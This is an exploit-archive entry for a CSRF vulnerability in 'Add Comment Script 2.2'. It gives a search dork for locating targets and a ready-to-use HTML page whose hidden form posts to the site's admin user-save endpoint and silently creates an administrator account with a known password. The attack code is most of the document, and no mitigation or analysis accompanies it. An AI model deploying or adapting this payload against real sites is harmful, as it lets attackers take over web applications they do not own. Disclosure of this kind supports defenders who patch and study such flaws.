id: 18333
date: 05/23/2012
title: Add Comment Script 2.2 CSRF Vulnerability (Add Admin)
author: AtT4CKxT3rR0r1ST
cves: 

Add Comment Script 2.2  CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cubescripts.com/comment-script.php
.:. Dork           : "PRO ADD COMMENT SCRIPT 2.2"
####################################################################

===[ Exploit ]===

<html>
<head>
<title>Add Comment Script 2.2 [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://SiTE/admin/user-save.php">
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="image.x" value="27"/>
<input type="hidden" name="image.y" value="18"/>
<input type="hidden" name="image" value="save"/>
</form>

</body>
</html>
####################################################################



#  0day.today [2023-03-27]  #